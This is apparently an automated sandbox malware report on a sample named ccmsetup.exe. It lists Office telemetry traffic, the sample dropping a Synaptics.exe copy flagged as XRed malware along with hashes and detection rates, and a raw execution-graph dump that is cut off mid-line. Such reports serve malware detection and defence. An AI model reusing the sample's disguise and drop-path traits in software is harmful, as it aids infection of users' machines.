                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        146 | 192.168.2.5 | 49956 | 13.107.246.63 | 443
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:51:10 UTC | 192 | OUT | GET /rules/rule703501v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:51:10 UTC | 494 | IN | HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:51:10 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1399
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:59 GMT
                                                                                        ETag: "0x8DC582BE8C605FF"
                                                                                        x-ms-request-id: 4885a0d8-201e-0096-65c7-45ace6000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215110Z-1746fd949bd6zq92hC1EWRry48000000035000000000wh7t
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:51:10 UTC | 1399 | IN
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703501" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSa


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        147 | 192.168.2.5 | 49957 | 13.107.246.63 | 443
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:51:10 UTC | 192 | OUT | GET /rules/rule703500v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:51:10 UTC | 495 | IN | HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:51:10 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1362
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                        ETag: "0x8DC582BDF497570"
                                                                                        x-ms-request-id: d9cb4e45-b01e-0084-305f-47d736000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215110Z-1746fd949bd5gpk5hC1EWR8dk400000000t00000000057qq
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_MISS
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:51:10 UTC | 1362 | IN
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703500" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSandbox" S="Medium" /> <F T="2">


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        148 | 192.168.2.5 | 49958 | 13.107.246.63 | 443
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:51:10 UTC | 192 | OUT | GET /rules/rule701801v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:51:10 UTC | 494 | IN | HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:51:10 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1403
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                        ETag: "0x8DC582BDC2EEE03"
                                                                                        x-ms-request-id: eed2a8f6-b01e-0001-60d2-4546e2000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215110Z-1746fd949bdtlp5chC1EWRq1v400000003ag00000000354s
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:51:10 UTC | 1403 | IN
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


Session ID: 149, Source IP: 192.168.2.5, Source Port: 49959, Destination IP: 13.107.246.63, Destination Port: 443
Timestamp: 2024-12-05 21:51:10 UTC, Bytes transferred: 192, Direction: OUT, Data:
GET /rules/rule701800v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
Timestamp: 2024-12-05 21:51:10 UTC, Bytes transferred: 494, Direction: IN, Data:
HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:51:10 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1366
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                        ETag: "0x8DC582BEA414B16"
                                                                                        x-ms-request-id: 3ad1336c-301e-0099-6986-466683000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215110Z-1746fd949bd54zxghC1EWRzre400000003e000000000ztnn
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
Timestamp: 2024-12-05 21:51:10 UTC, Bytes transferred: 1366, Direction: IN, Data:
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenResources" S="Medium" /> <F T="2


                                                                                        Target ID:0
                                                                                        Start time:16:49:56
                                                                                        Start date:05/12/2024
                                                                                        Path:C:\Users\user\Desktop\ccmsetup.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\Desktop\ccmsetup.exe"
                                                                                        Imagebase:0x400000
                                                                                        File size:4'873'728 bytes
                                                                                        MD5 hash:823444545911FD17E953437B7C712F2F
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:Borland Delphi
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000000.00000000.2022900400.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000000.2022900400.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        Target ID:2
                                                                                        Start time:16:49:57
                                                                                        Start date:05/12/2024
                                                                                        Path:C:\Users\user\Desktop\._cache_ccmsetup.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\Desktop\._cache_ccmsetup.exe"
                                                                                        Imagebase:0x570000
                                                                                        File size:4'102'192 bytes
                                                                                        MD5 hash:169E238A8E29445C319F934362361D28
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Antivirus matches:
                                                                                        • Detection: 0%, ReversingLabs
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        Target ID:3
                                                                                        Start time:16:49:58
                                                                                        Start date:05/12/2024
                                                                                        Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                                                                                        Imagebase:0x400000
                                                                                        File size:771'584 bytes
                                                                                        MD5 hash:020E869138373254D25D50294CEB45AF
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:Borland Delphi
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000003.00000003.2109250018.00000000006E1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                        Antivirus matches:
                                                                                        • Detection: 100%, Avira
                                                                                        • Detection: 100%, Avira
                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                        • Detection: 92%, ReversingLabs
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        Target ID:4
                                                                                        Start time:16:50:00
                                                                                        Start date:05/12/2024
                                                                                        Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                                                                                        Imagebase:0x1a0000
                                                                                        File size:53'161'064 bytes
                                                                                        MD5 hash:4A871771235598812032C822E6F68F19
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:false

                                                                                        Target ID:7
                                                                                        Start time:16:50:11
                                                                                        Start date:05/12/2024
                                                                                        Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\ProgramData\Synaptics\Synaptics.exe"
                                                                                        Imagebase:0x400000
                                                                                        File size:771'584 bytes
                                                                                        MD5 hash:020E869138373254D25D50294CEB45AF
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:Borland Delphi
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        Target ID:12
                                                                                        Start time:16:50:52
                                                                                        Start date:05/12/2024
                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2180 -s 11516
                                                                                        Imagebase:0x5f0000
                                                                                        File size:483'680 bytes
                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:14
                                                                                        Start time:16:51:04
                                                                                        Start date:05/12/2024
                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2180 -s 11544
                                                                                        Imagebase:0x5f0000
                                                                                        File size:483'680 bytes
                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:26
                                                                                        Start time:16:51:18
                                                                                        Start date:05/12/2024
                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2180 -s 1912
                                                                                        Imagebase:0x5f0000
                                                                                        File size:483'680 bytes
                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:29
                                                                                        Start time:16:51:19
                                                                                        Start date:05/12/2024
                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2180 -s 4528
                                                                                        Imagebase:0x5f0000
                                                                                        File size:483'680 bytes
                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:34
                                                                                        Start time:16:51:19
                                                                                        Start date:05/12/2024
                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2180 -s 11368
                                                                                        Imagebase:0x5f0000
                                                                                        File size:483'680 bytes
                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:36
                                                                                        Start time:16:51:19
                                                                                        Start date:05/12/2024
                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2180 -s 11488
                                                                                        Imagebase:0x5f0000
                                                                                        File size:483'680 bytes
                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                          Execution Graph

                                                                                          Execution Coverage:5.3%
                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                          Signature Coverage:1.7%
                                                                                          Total number of Nodes:2000
                                                                                          Total number of Limit Nodes:90
75745->75722 75747 586f05 75746->75747 75748 59ef10 2 API calls 75747->75748 75749 586f14 75748->75749 75749->75682 75750->75603 75752 5f41d6 __EH_prolog3 75751->75752 76582 5f4ccf 75752->76582 75754 5f4208 75754->75620 75755->75601 75757 5f52ba 75756->75757 75758 5d1bbb _W_store_winword 68 API calls 75757->75758 75759 58b98e 75758->75759 75759->75618 75759->75619 75760->75636 76617 5f5dc4 75761->76617 75763 5f5693 75763->75682 75764->75632 75765->75671 75767 5d1c3c 75766->75767 75768 5d1bc7 75766->75768 76644 5d1c4e 68 API calls 4 library calls 75767->76644 75774 5d1bec 75768->75774 76642 5d5999 66 API calls __getptd_noexit 75768->76642 75771 5d1c49 75771->75669 75772 5d1bd3 76643 5d592a 7 API calls _memcpy_s 75772->76643 75774->75669 75775 5d1bde 75775->75669 75776->75669 75777->75669 75779 5f6477 __EH_prolog3_catch_GS 75778->75779 75780 5f6541 75779->75780 75781 5f64b5 75779->75781 75783 5f6552 GetCurrentThreadId 75780->75783 75784 5f64ca 75780->75784 76645 59f4f9 RtlFreeHeap VirtualFree 75781->76645 75783->75784 75786 5f658e 75784->75786 76647 5f0dba 6 API calls 75784->76647 75786->75678 75787 5a0c32 71 API calls 75789 5f64bd 75787->75789 75789->75784 75789->75787 75790 59ef10 2 API calls 75789->75790 76646 5a0532 71 API calls 75789->76646 75790->75789 75791->75682 75792->75682 75793->75682 75794->75603 75796 5f2184 __EH_prolog3_catch_GS 75795->75796 75797 5f21bc TlsGetValue 75796->75797 75798 5f2206 TlsSetValue 75797->75798 75799 5f21f6 75797->75799 75814 5facce 75798->75814 75859 59f417 75799->75859 75801 5f2235 75803 5f229e 75801->75803 75863 5faaed 269 API calls __EH_prolog3_catch 75801->75863 75831 5f12be 75803->75831 75804 5f2364 75804->75685 75807 5f22c7 75810 5f228d 75807->75810 75812 5f22e2 GetCurrentThreadId 75807->75812 75808 5f224c 75808->75803 75809 5f2258 75808->75809 75809->75810 75811 5f2267 GetCurrentThreadId 75809->75811 75813 5f2342 TlsSetValue 75810->75813 75811->75810 75812->75810 75813->75799 75815 5facda __EH_prolog3_catch 75814->75815 
75816 5facfc 75815->75816 75817 5fad55 75815->75817 75822 5fad0f GetCurrentThreadId 75816->75822 75824 5fad35 75816->75824 75818 5fad5b 75817->75818 75819 5fad96 75817->75819 75818->75824 75826 5fad6e GetCurrentThreadId 75818->75826 75820 5fad9c 75819->75820 75821 5fadda 75819->75821 75820->75824 75827 5fadaf GetCurrentThreadId 75820->75827 75865 5f4829 91 API calls vswprintf 75821->75865 75822->75824 75829 5fad4c 75824->75829 75864 5f0dba 6 API calls 75824->75864 75825 5fadf4 75825->75829 75866 5f0dba 6 API calls 75825->75866 75826->75824 75827->75824 75829->75801 75832 5f12ca __EH_prolog3_catch_GS 75831->75832 75833 5f12fe 75832->75833 75846 5f1343 75832->75846 75834 5f130e GetCurrentThreadId 75833->75834 75835 5f1331 75833->75835 75834->75835 75836 5f1452 TlsGetValue 75835->75836 75857 5f1520 75835->75857 75837 5f1466 75836->75837 75836->75857 75871 6151b3 14 API calls __EH_prolog3_catch 75837->75871 75838 59ef10 2 API calls 75839 5f152f 75838->75839 75842 59ef10 2 API calls 75839->75842 75841 5f1472 75841->75857 75872 66c86b 75841->75872 75843 5f153e 75842->75843 75843->75807 75846->75835 75867 5925e0 75846->75867 75849 5f13f5 GetCurrentThreadId 75849->75835 75850 5f14a6 TlsSetValue 75851 5f12be 264 API calls 75850->75851 75852 5f14d2 75851->75852 75853 5f14e4 TlsSetValue 75852->75853 75896 5f0b59 82 API calls 2 library calls 75852->75896 75856 66c86b 66 API calls 75853->75856 75856->75857 75857->75838 75860 59f422 75859->75860 75861 5bc737 75860->75861 75862 5f3f60 2 API calls 75860->75862 75861->75804 75862->75861 75863->75808 75864->75829 75865->75825 75866->75829 75868 5925f4 75867->75868 75897 5f19fe 75868->75897 75870 592620 75870->75835 75870->75849 75871->75841 75993 5d6796 75872->75993 75875 5d6796 _rand 66 API calls 75876 5f1489 75875->75876 75877 5f094c 75876->75877 75878 5f095b __EH_prolog3_catch_GS 75877->75878 75879 5f09ca 75878->75879 75880 5f0983 75878->75880 76020 5f165e 75879->76020 75881 5f0996 GetCurrentThreadId 75880->75881 75895 5f09bf 
75880->75895 75881->75895 75884 5f0b49 75884->75850 75885 5f09d0 75886 592624 264 API calls 75885->75886 75892 5f0a12 75885->75892 75886->75892 75887 5f0a5a 75888 5f0a63 GetCurrentThread GetThreadTimes GetSystemTimeAsFileTime 75887->75888 75889 5f0ab7 75887->75889 75888->75889 76101 5f2553 70 API calls __EH_prolog3_catch 75889->76101 75891 5f0ac3 75894 5f0ade GetCurrentThreadId 75891->75894 75891->75895 75892->75887 75892->75888 76041 5f99f8 75892->76041 75894->75895 76095 5777ff 75895->76095 75896->75853 75898 5f1a0d __EH_prolog3_catch_GS 75897->75898 75909 5f1ade 75898->75909 75959 5f10f0 75898->75959 75900 5f1b23 75901 5f1b2f WideCharToMultiByte 75900->75901 75900->75909 75902 5f1bbb 75901->75902 75903 5f1b60 GetLastError 75901->75903 75906 5f1c14 WideCharToMultiByte 75902->75906 75972 5bcb46 75902->75972 75905 5f1b87 GetCurrentThreadId 75903->75905 75903->75909 75904 59f417 2 API calls 75907 5f2133 75904->75907 75905->75909 75913 5f1ccf CreateFileW 75906->75913 75914 5f1c55 EnterCriticalSection 75906->75914 75912 59f417 2 API calls 75907->75912 75909->75904 75916 5f214b 75912->75916 75969 57814c 75913->75969 75914->75913 75917 5f1c6b 75914->75917 75915 5f1bd4 75915->75909 75919 5f1bec GetCurrentThreadId 75915->75919 75920 5f216b 75916->75920 75921 5f2159 CloseHandle 75916->75921 75922 57814c CloseHandle 75917->75922 75919->75909 75920->75870 75921->75920 75924 5f1c78 75922->75924 75930 5f1e35 SetFilePointer 75924->75930 75931 5f1c80 LockFileEx 75924->75931 75925 5f1d5b GetFileType 75928 5f1d6c 75925->75928 75929 5f1da8 SetFilePointer 75925->75929 75926 5f1d00 GetLastError 75927 5f1d23 GetCurrentThreadId 75926->75927 75932 5f1cb8 75926->75932 75927->75932 75928->75932 75933 5f1d80 GetCurrentThreadId 75928->75933 75929->75924 75934 5f1dc0 WriteFile 75929->75934 75937 5f1e6f 75930->75937 75938 5f2009 WriteFile 75930->75938 75931->75930 75931->75932 75932->75909 75940 5f20f8 LeaveCriticalSection 75932->75940 75933->75932 75934->75924 75936 5f1de3 GetLastError 
75934->75936 75936->75932 75939 5f1e0a GetCurrentThreadId 75936->75939 75978 5f2842 269 API calls __EH_prolog3_catch_GS 75937->75978 75942 5f203e GetLastError 75938->75942 75943 5f1ece 75938->75943 75939->75932 75940->75909 75942->75943 75945 5f2065 GetCurrentThreadId 75942->75945 75943->75932 75948 5f20d4 UnlockFileEx 75943->75948 75944 5f1e84 75946 5f1ed7 SetFilePointer 75944->75946 75947 5f1e90 75944->75947 75945->75943 75950 5f1eeb GetLastError 75946->75950 75951 5f1f36 SetEndOfFile 75946->75951 75947->75943 75949 5f1e9f GetCurrentThreadId 75947->75949 75948->75932 75952 5f1ec5 75949->75952 75950->75943 75953 5f1f0e GetCurrentThreadId 75950->75953 75954 5f1f98 WriteFile 75951->75954 75955 5f1f46 GetLastError 75951->75955 75952->75943 75953->75952 75954->75938 75957 5f1fb7 GetLastError 75954->75957 75955->75943 75956 5f1f6d GetCurrentThreadId 75955->75956 75956->75952 75957->75943 75958 5f1fde GetCurrentThreadId 75957->75958 75958->75938 75960 5f10ff __EH_prolog3_catch_GS 75959->75960 75961 5f1148 GetLocalTime GetTimeZoneInformation 75960->75961 75966 5f117a _wcsrchr 75961->75966 75962 5f11d6 75963 5f11ff 75962->75963 75964 5f11f9 GetCurrentThreadId 75962->75964 75968 5f11e3 75962->75968 75980 5faa2c 269 API calls __EH_prolog3_catch 75963->75980 75964->75963 75966->75962 75979 5f2fbf 91 API calls vswprintf 75966->75979 75968->75900 75970 578164 75969->75970 75971 578159 CloseHandle 75969->75971 75970->75925 75970->75926 75971->75970 75973 5bcb5a 75972->75973 75981 5bcba8 75973->75981 75977 5bcb8b 75977->75906 75977->75915 75978->75944 75979->75962 75980->75968 75982 5bcbeb 75981->75982 75983 5bcbbb 75981->75983 75984 59f417 2 API calls 75982->75984 75985 5bcbc3 75983->75985 75986 5bcbd6 75983->75986 75989 5bcb72 75984->75989 75991 5bc6f1 VirtualAlloc RtlAllocateHeap 75985->75991 75992 5a05b3 HeapReAlloc VirtualAlloc RtlAllocateHeap RtlFreeHeap VirtualFree 75986->75992 75989->75977 75990 5bc724 RtlFreeHeap VirtualFree 75989->75990 75990->75977 75991->75989 
75992->75989 75998 5d67ae GetLastError 75993->75998 75995 5d679c 75996 5d67a9 75995->75996 76012 5d4dd5 66 API calls 4 library calls 75995->76012 75996->75875 76013 5d5429 75998->76013 76000 5d67c3 76001 5d6811 SetLastError 76000->76001 76016 5d50bd 66 API calls 2 library calls 76000->76016 76001->75995 76003 5d67d6 76003->76001 76017 5d5448 TlsSetValue 76003->76017 76005 5d67ea 76006 5d6808 76005->76006 76007 5d67f0 76005->76007 76019 5d1f09 66 API calls 2 library calls 76006->76019 76018 5d681d 66 API calls 4 library calls 76007->76018 76010 5d67f8 GetCurrentThreadId 76010->76001 76011 5d680e 76011->76001 76012->75996 76014 5d543c 76013->76014 76015 5d5440 TlsGetValue 76013->76015 76014->76000 76015->76000 76016->76003 76017->76005 76018->76010 76019->76011 76021 5f166d __EH_prolog3_catch_GS 76020->76021 76102 5f0651 76021->76102 76023 5f1699 76024 59ef10 2 API calls 76023->76024 76028 5f1703 76023->76028 76024->76028 76025 5f17dc 76113 6154a5 ReleaseSemaphore ReleaseSemaphore 76025->76113 76027 5f178e 76027->75885 76028->76025 76029 5f173d 76028->76029 76030 5f1794 76028->76030 76031 5f1749 GetCurrentThreadId 76029->76031 76032 5f1773 76029->76032 76110 5f031a 69 API calls __EH_prolog3_catch 76030->76110 76031->76032 76108 577d91 RtlFreeHeap VirtualFree __EH_prolog3 76032->76108 76035 5f1782 76109 6154a5 ReleaseSemaphore ReleaseSemaphore 76035->76109 76037 5f17c4 76111 65a060 RtlFreeHeap VirtualFree __EH_prolog3 76037->76111 76039 5f17d0 76112 577d91 RtlFreeHeap VirtualFree __EH_prolog3 76039->76112 76042 5f9a04 __EH_prolog3_catch_GS 76041->76042 76045 5f9a4a 76042->76045 76120 5d0e41 66 API calls 76042->76120 76044 5f9a64 76044->75887 76045->76044 76046 5f9ab0 RegOpenKeyExW 76045->76046 76047 5f9adf 76046->76047 76048 5f9b3d RegQueryValueExW 76046->76048 76052 5f9af9 GetCurrentThreadId 76047->76052 76054 5f9b1c 76047->76054 76049 5f9b5c 76048->76049 76050 5f9b9b 76048->76050 76053 5f9b76 GetCurrentThreadId 76049->76053 76049->76054 76051 5f9ba1 76050->76051 
76057 5f9bde 76050->76057 76051->76054 76056 5f9bb6 GetCurrentThreadId 76051->76056 76052->76054 76053->76054 76055 5f9b34 76054->76055 76121 5f0dba 6 API calls 76054->76121 76059 5f9f1e RegCloseKey 76055->76059 76060 5f9f27 76055->76060 76056->76054 76122 5fae3f 98 API calls __EH_prolog3_catch 76057->76122 76059->76060 76060->76044 76062 5f9f32 FreeLibrary 76060->76062 76062->76044 76063 5f9bff 76064 5f9c14 GetCurrentThreadId 76063->76064 76065 5f9c40 76063->76065 76071 5f9c55 76063->76071 76064->76065 76067 59ef10 2 API calls 76065->76067 76066 5f4ccf 76 API calls 76066->76071 76067->76071 76069 59ef10 RtlFreeHeap VirtualFree 76069->76071 76070 5f9cec SetErrorMode LoadLibraryExW 76072 5f9d4e SetErrorMode 76070->76072 76073 5f9d1b 76070->76073 76071->76066 76071->76069 76071->76070 76123 605eb4 76071->76123 76075 5f9d5e 76072->76075 76081 5f9db9 76072->76081 76142 6087ad 87 API calls 2 library calls 76073->76142 76079 5f9d78 GetCurrentThreadId 76075->76079 76080 5f9da4 76075->76080 76076 5f9e21 GetProcAddress 76078 5f9ed6 76076->76078 76089 5f9e35 76076->76089 76077 5f9d2c LoadLibraryExW GetLastError 76077->76072 76082 59ef10 2 API calls 76078->76082 76079->76080 76083 59ef10 2 API calls 76080->76083 76081->76076 76084 5f9dd7 GetCurrentThreadId 76081->76084 76085 5f9e03 76081->76085 76086 5f9ef9 76082->76086 76083->76081 76084->76085 76087 59ef10 2 API calls 76085->76087 76086->76055 76088 5f9e18 76087->76088 76088->76076 76090 5f9e4f GetCurrentThreadId 76089->76090 76091 5f9e7b 76089->76091 76093 5f9e90 76089->76093 76090->76091 76092 59ef10 2 API calls 76091->76092 76092->76093 76094 59ef10 2 API calls 76093->76094 76094->76078 76096 57780b __EH_prolog3 76095->76096 76097 59ef10 2 API calls 76096->76097 76098 577826 76097->76098 76099 59ef10 2 API calls 76098->76099 76100 57783b 76099->76100 76100->75884 76101->75891 76103 5f065d __EH_prolog3_catch 76102->76103 76114 6153f3 GetCurrentThreadId 76103->76114 76105 5f067d 76106 5f068f 76105->76106 76118 5d21c0 
RaiseException 76105->76118 76106->76023 76108->76035 76109->76027 76110->76037 76111->76039 76112->76025 76113->76027 76115 61540a 76114->76115 76117 61543f 76114->76117 76115->76117 76119 61560c WaitForSingleObject Sleep CreateSemaphoreW 76115->76119 76117->76105 76118->76106 76119->76117 76120->76045 76121->76055 76122->76063 76124 605ec0 __EH_prolog3_catch_GS 76123->76124 76125 605eeb 76124->76125 76126 605f3d 76124->76126 76128 605ef4 GetCurrentThreadId 76125->76128 76129 605f22 76125->76129 76143 608d50 76126->76143 76128->76129 76135 605f34 76129->76135 76188 5f0dba 6 API calls 76129->76188 76130 605f52 76131 605f58 76130->76131 76132 605f9c 76130->76132 76137 605f61 GetCurrentThreadId 76131->76137 76138 605f8b 76131->76138 76152 608f91 76132->76152 76135->76071 76137->76138 76189 577d91 RtlFreeHeap VirtualFree __EH_prolog3 76138->76189 76142->76077 76144 608d5c __EH_prolog3_catch 76143->76144 76145 608d84 76144->76145 76147 608ddc 76144->76147 76146 608d97 GetCurrentThreadId 76145->76146 76148 608dc0 76145->76148 76146->76148 76147->76148 76149 608df6 GetCurrentThreadId 76147->76149 76151 608dd6 76148->76151 76190 5f0dba 6 API calls 76148->76190 76149->76148 76151->76130 76153 608f9d __EH_prolog3_catch_GS 76152->76153 76188->76135 76189->76129 76190->76151 76234 5f6646 __EH_prolog3 76233->76234 76235 5f665e RegCloseKey 76234->76235 76236 5f666a 76234->76236 76235->76236 76236->75689 76238 5b185d 76237->76238 76239 5b184c 76237->76239 76242 5f7229 76238->76242 76269 5fc812 15 API calls __EH_prolog3_catch 76239->76269 76241 5b1856 76241->76238 76243 5f7235 __EH_prolog3_catch 76242->76243 76245 5f725c 76243->76245 76270 5f6706 76243->76270 76249 5f7271 76245->76249 76276 5f0dba 6 API calls 76245->76276 76249->75695 76251 5f72e2 76251->76245 76252 5f7305 76251->76252 76253 5f72f2 76251->76253 76252->76245 76255 5f730e 76252->76255 76254 5f66cd RegCloseKey 76253->76254 76256 5f72fa 76254->76256 76277 5fc812 15 API calls __EH_prolog3_catch 76255->76277 76258 
